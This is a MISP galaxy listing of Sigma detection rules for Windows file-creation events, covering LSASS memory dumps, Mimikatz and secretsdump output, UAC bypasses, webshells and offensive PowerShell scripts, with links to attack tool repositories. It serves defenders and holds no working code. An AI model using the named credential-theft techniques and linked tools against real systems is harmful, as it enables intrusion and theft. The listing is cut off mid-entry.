Legitimate Application Dropped Executable
Detects programs on a Windows system that should not write executables to disk
Internal MISP references
UUID f0540f7e-2db3-4432-b9e0-3965486744bc which can be used as unique global reference for Legitimate Application Dropped Executable in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Florian Roth (Nextron Systems) |
| creation_date | 2022-08-21 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_legitimate_app_dropping_exe.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
NTDS.DIT Creation By Uncommon Process
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
Internal MISP references
UUID 11b1ed55-154d-4e82-8ad7-83739298f720 which can be used as unique global reference for NTDS.DIT Creation By Uncommon Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-01-11 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_ntds_dit_uncommon_process.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.002', 'attack.t1003.003'] |
Related clusters
To see the related clusters, click here.
Writing Local Admin Share
Adversaries may interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
Internal MISP references
UUID 4aafb0fa-bff5-4b9d-b99e-8093e659c65f which can be used as unique global reference for Writing Local Admin Share in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-01 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_writing_local_admin_share.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.lateral-movement', 'attack.t1546.002'] |
Related clusters
To see the related clusters, click here.
Suspicious MSExchangeMailboxReplication ASPX Write
Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation.
Internal MISP references
UUID 7280c9f3-a5af-45d0-916a-bc01cb4151c9 which can be used as unique global reference for Suspicious MSExchangeMailboxReplication ASPX Write in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-25 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_exchange_aspx_write.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1190', 'attack.persistence', 'attack.t1505.003'] |
Related clusters
To see the related clusters, click here.
Files With System Process Name In Unsuspected Locations
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Internal MISP references
UUID d5866ddf-ce8f-4aea-b28e-d96485a20d3d which can be used as unique global reference for Files With System Process Name In Unsuspected Locations in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2020-05-26 |
| falsepositive | ['System processes copied outside their default folders for testing purposes', 'Third party software naming their software with the same names as the processes mentioned here'] |
| filename | file_event_win_creation_system_file.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.005'] |
Related clusters
To see the related clusters, click here.
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
Internal MISP references
UUID 6e2a900a-ced9-4e4a-a9c2-13e706f9518a which can be used as unique global reference for HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump in MISP communities and other software using the MISP galaxy
External references
- https://github.com/Porchetta-Industries/CrackMapExec - webarchive
- https://github.com/fortra/impacket/blob/ff8c200fd040b04d3b5ff05449646737f836235d/examples/secretsdump.py - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | SecurityAura |
| creation_date | 2022-11-16 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_hktl_remote_cred_dump.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003'] |
Related clusters
To see the related clusters, click here.
UAC Bypass Using IEInstal - File
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Internal MISP references
UUID bdd8157d-8e85-4397-bb82-f06cc9c71dbb which can be used as unique global reference for UAC Bypass Using IEInstal - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_ieinstal.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Publisher Attachment File Dropped In Suspicious Location
Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
Internal MISP references
UUID 3d2a2d59-929c-4b78-8c1a-145dfe9e07b1 which can be used as unique global reference for Publisher Attachment File Dropped In Suspicious Location in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-08 |
| falsepositive | ['Legitimate usage of ".pub" files from those locations'] |
| filename | file_event_win_office_publisher_files_in_susp_locations.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Suspicious File Write to SharePoint Layouts Directory
Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.
Internal MISP references
UUID 1f0489be-b496-4ddf-b3a9-5900f2044e9c which can be used as unique global reference for Suspicious File Write to SharePoint Layouts Directory in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/ - webarchive
- https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-07-24 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1190', 'attack.persistence', 'attack.t1505.003'] |
Related clusters
Potential Binary Or Script Dropper Via PowerShell
Detects PowerShell creating a binary executable or a script file.
Internal MISP references
UUID 7047d730-036f-4f40-b9d8-1c63e36d5e62 which can be used as unique global reference for Potential Binary Or Script Dropper Via PowerShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-03-17 |
| falsepositive | ['False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.'] |
| filename | file_event_win_powershell_drop_binary_or_script.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Windows Shell/Scripting Application File Write to Suspicious Folder
Detects Windows shells and scripting applications that write files to suspicious folders.
Internal MISP references
UUID 1277f594-a7d1-4f28-a2d3-73af5cbeab43 which can be used as unique global reference for Windows Shell/Scripting Application File Write to Suspicious Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-11-20 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_shell_write_susp_directory.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
Uncommon File Created In Office Startup Folder
Detects the creation of a file with an uncommon extension in an Office application startup folder.
Internal MISP references
UUID a10a2c40-2c4d-49f8-b557-1a946bc55d9d which can be used as unique global reference for Uncommon File Created In Office Startup Folder in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions - webarchive
- https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3 - webarchive
- https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/ - webarchive
- http://addbalance.com/word/startup.htm - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-05 |
| falsepositive | ['False positive might stem from rare extensions used by other Office utilities.'] |
| filename | file_event_win_office_uncommon_file_startup.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1587.001'] |
Related clusters
DPAPI Backup Keys And Certificate Export Activity IOC
Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
Internal MISP references
UUID 7892ec59-c5bb-496d-8968-e5d210ca3ac4 which can be used as unique global reference for DPAPI Backup Keys And Certificate Export Activity IOC in MISP communities and other software using the MISP galaxy
External references
- https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/ - webarchive
- https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-06-26 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1555', 'attack.t1552.004'] |
Related clusters
HackTool - Mimikatz Kirbi File Creation
Detects the creation of files generated by Mimikatz, such as ".kirbi", "mimilsa.log", etc.
Internal MISP references
UUID 9e099d99-44c2-42b6-a6d8-54c3545cab29 which can be used as unique global reference for HackTool - Mimikatz Kirbi File Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), David ANDRE |
| creation_date | 2021-11-08 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_hktl_mimikatz_files.yml |
| level | critical |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1558'] |
Related clusters
Potential Persistence Via Notepad++ Plugins
Detects the creation of new ".dll" files inside the plugins directory of a Notepad++ installation by a process other than "gup.exe", which could indicate possible persistence.
Internal MISP references
UUID 54127bd4-f541-4ac3-afdb-ea073f63f692 which can be used as unique global reference for Potential Persistence Via Notepad++ Plugins in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-10 |
| falsepositive | ['Possible FPs during first installation of Notepad++', 'Legitimate use of custom plugins by users in order to enhance notepad++ functionalities'] |
| filename | file_event_win_notepad_plus_plus_persistence.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Malicious PowerShell Scripts - FileCreation
Detects the creation of known offensive PowerShell scripts used for exploitation.
Internal MISP references
UUID f331aa1f-8c53-4fc3-b083-cc159bc971cb which can be used as unique global reference for Malicious PowerShell Scripts - FileCreation in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - webarchive
- https://github.com/adrecon/ADRecon - webarchive
- https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - webarchive
- https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries - webarchive
- https://github.com/DarkCoderSc/PowerRunAsSystem/ - webarchive
- https://github.com/HarmJ0y/DAMP - webarchive
- https://github.com/CsEnox/EventViewer-UACBypass - webarchive
- https://github.com/nettitude/Invoke-PowerThIEf - webarchive
- https://github.com/samratashok/nishang - webarchive
- https://github.com/PowerShellMafia/PowerSploit - webarchive
- https://github.com/besimorhino/powercat - webarchive
- https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1 - webarchive
- https://github.com/adrecon/AzureADRecon - webarchive
- https://github.com/NetSPI/PowerUpSQL - webarchive
- https://github.com/Kevin-Robertson/Powermad - webarchive
- https://github.com/The-Viper-One/Invoke-PowerDPAPI/ - webarchive
- https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - webarchive
- https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1 - webarchive
- https://github.com/S3cur3Th1sSh1t/WinPwn - webarchive
- https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - webarchive
- https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - webarchive
- https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein |
| creation_date | 2018-04-07 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_powershell_exploit_scripts.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
Dynamic CSharp Compile Artefact
When C# is compiled dynamically, a .cmdline file will be created as part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
Internal MISP references
UUID e4a74e34-ecde-4aab-b2fb-9112dd01aed0 which can be used as unique global reference for Dynamic CSharp Compile Artefact in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-09 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_csharp_compile_artefact.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027.004'] |
Related clusters
LSASS Process Memory Dump Creation Via Taskmgr.EXE
Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
Internal MISP references
UUID 69ca12af-119d-44ed-b50f-a47af0ebc364 which can be used as unique global reference for LSASS Process Memory Dump Creation Via Taskmgr.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel |
| creation_date | 2023-10-19 |
| falsepositive | ['Rare case of troubleshooting by an administrator or support that has to be investigated regardless'] |
| filename | file_event_win_taskmgr_lsass_dump.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Related clusters
PSEXEC Remote Execution File Artefact
Detects the creation of the PsExec key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system.
Internal MISP references
UUID 304afd73-55a5-4bb9-8c21-0b1fc84ea9e4 which can be used as unique global reference for PSEXEC Remote Execution File Artefact in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-21 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_sysinternals_psexec_service_key.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1136.002', 'attack.t1543.003', 'attack.t1570', 'attack.s0029'] |
Related clusters
LSASS Process Memory Dump Files
Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
Internal MISP references
UUID a5a2d357-1ab8-4675-a967-ef9990a59391 which can be used as unique global reference for LSASS Process Memory Dump Files in MISP communities and other software using the MISP galaxy
External references
- https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35 - webarchive
- https://github.com/helpsystems/nanodump - webarchive
- https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258 - webarchive
- https://github.com/CCob/MirrorDump - webarchive
- https://www.google.com/search?q=procdump+lsass - webarchive
- https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf - webarchive
- https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml - webarchive
- https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-11-15 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_lsass_default_dump_file_names.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Related clusters
UAC Bypass Using NTFS Reparse Point - File
Detects the pattern of a UAC bypass using an NTFS reparse point and wusa.exe DLL hijacking (UACMe 36).
Internal MISP references
UUID 7fff6773-2baa-46de-a24a-b6eec1aba2d1 which can be used as unique global reference for UAC Bypass Using NTFS Reparse Point - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_ntfs_reparse_point.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
Suspicious Scheduled Task Write to System32 Tasks
Detects the creation of scheduled tasks by processes executed from suspicious locations.
Internal MISP references
UUID 80e1f67a-4596-4351-98f5-a9c3efabac95 which can be used as unique global reference for Suspicious Scheduled Task Write to System32 Tasks in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-11-16 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_task_write.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1053'] |
Related clusters
ISO or Image Mount Indicator in Recent Files
Detects the creation of a recent-items element file that points to an .ISO, .IMG, .VHD or .VHDX file, as often used in phishing attacks. This can be a false positive on server systems, but on workstations users should rarely mount .iso or .img files.
Internal MISP references
UUID 4358e5a5-7542-4dcb-b9f3-87667371839b which can be used as unique global reference for ISO or Image Mount Indicator in Recent Files in MISP communities and other software using the MISP galaxy
External references
- https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/ - webarchive
- https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/ - webarchive
- https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-11 |
| falsepositive | ['Cases in which a user mounts an image file for legitimate reasons'] |
| filename | file_event_win_iso_file_recent.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1566.001'] |
Related clusters
Creation Exe for Service with Unquoted Path
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Internal MISP references
UUID 8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9 which can be used as unique global reference for Creation Exe for Service with Unquoted Path in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-30 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_creation_unquoted_service_path.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.009'] |
Related clusters
Windows Terminal Profile Settings Modification By Uncommon Process
Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
Internal MISP references
UUID 9b64de98-9db3-4033-bd7a-f51430105f00 which can be used as unique global reference for Windows Terminal Profile Settings Modification By Uncommon Process in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile - webarchive
- https://twitter.com/nas_bench/status/1550836225652686848 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-07-22 |
| falsepositive | ['Some false positives may occur with admin scripts that set WT settings.'] |
| filename | file_event_win_susp_windows_terminal_profile.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.015'] |
Related clusters
Suspicious Files in Default GPO Folder
Detects the creation of copies of suspicious files (EXE/DLL) in the default GPO storage folder.
Internal MISP references
UUID 5f87308a-0a5b-4623-ae15-d8fa1809bc60 which can be used as unique global reference for Suspicious Files in Default GPO Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | elhoim |
| creation_date | 2022-04-28 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_default_gpo_dir_write.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.t1036.005', 'attack.defense-evasion'] |
Related clusters
SCR File Write Event
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
Internal MISP references
UUID c048f047-7e2a-4888-b302-55f509d4a91d which can be used as unique global reference for SCR File Write Event in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christopher Peacock @securepeacock, SCYTHE @scythe_io |
| creation_date | 2022-04-27 |
| falsepositive | ['The installation of new screen savers by third party software'] |
| filename | file_event_win_new_scr_file.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.011'] |
Related clusters
Wmiprvse Wbemcomn DLL Hijack - File
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.
Internal MISP references
UUID 614a7e17-5643-4d89-b6fe-f9df1a79641c which can be used as unique global reference for Wmiprvse Wbemcomn DLL Hijack - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-10-12 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_wmiprvse_wbemcomn_dll_hijack.yml |
| level | critical |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047', 'attack.lateral-movement', 'attack.t1021.002'] |
Related clusters
PowerShell Script Dropped Via PowerShell.EXE
Detects PowerShell creating a PowerShell file (.ps1). While this behavior is often benign, it can sometimes be a sign of a dropper script trying to achieve persistence.
Internal MISP references
UUID 576426ad-0131-4001-ae01-be175da0c108 which can be used as unique global reference for PowerShell Script Dropped Via PowerShell.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2023-05-09 |
| falsepositive | ['False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.'] |
| filename | file_event_win_powershell_drop_powershell.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Potential Suspicious PowerShell Module File Created
Detects the creation of a new PowerShell module in the first folder of the module directory structure, e.g. "\WindowsPowerShell\Modules\malware\malware.psm1". This is a somewhat uncommon practice, as legitimate modules often include a version folder.
Internal MISP references
UUID e8a52bbd-bced-459f-bd93-64db45ce7657 which can be used as unique global reference for Potential Suspicious PowerShell Module File Created in MISP communities and other software using the MISP galaxy
External references
- Internal Research
- https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-09 |
| falsepositive | ['False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.'] |
| filename | file_event_win_powershell_module_susp_creation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Potential Webshell Creation On Static Website
Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
Internal MISP references
UUID 39f1f9f2-9636-45de-98f6-a4046aa8e4b9 which can be used as unique global reference for Potential Webshell Creation On Static Website in MISP communities and other software using the MISP galaxy
External references
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md - webarchive
- PT ESC rule and personal experience
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Beyu Denis, oscd.community, Tim Shelton, Thurein Oo |
| creation_date | 2019-10-22 |
| falsepositive | ['Legitimate administrator or developer creating legitimate executable files in a web application folder'] |
| filename | file_event_win_webshell_creation_detect.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1505.003'] |
Related clusters
UAC Bypass Using EventVwr
Detects the pattern of a UAC bypass using Windows Event Viewer.
Internal MISP references
UUID 63e4f530-65dc-49cc-8f80-ccfa95c69d43 which can be used as unique global reference for UAC Bypass Using EventVwr in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute - webarchive
- https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw - webarchive
- https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Antonio Cocomazzi (idea), Florian Roth (Nextron Systems) |
| creation_date | 2022-04-27 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_eventvwr.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation'] |
Suspicious desktop.ini Action
Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
Internal MISP references
UUID 81315b50-6b60-4d8f-9928-3466e1022515 which can be used as unique global reference for Suspicious desktop.ini Action in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
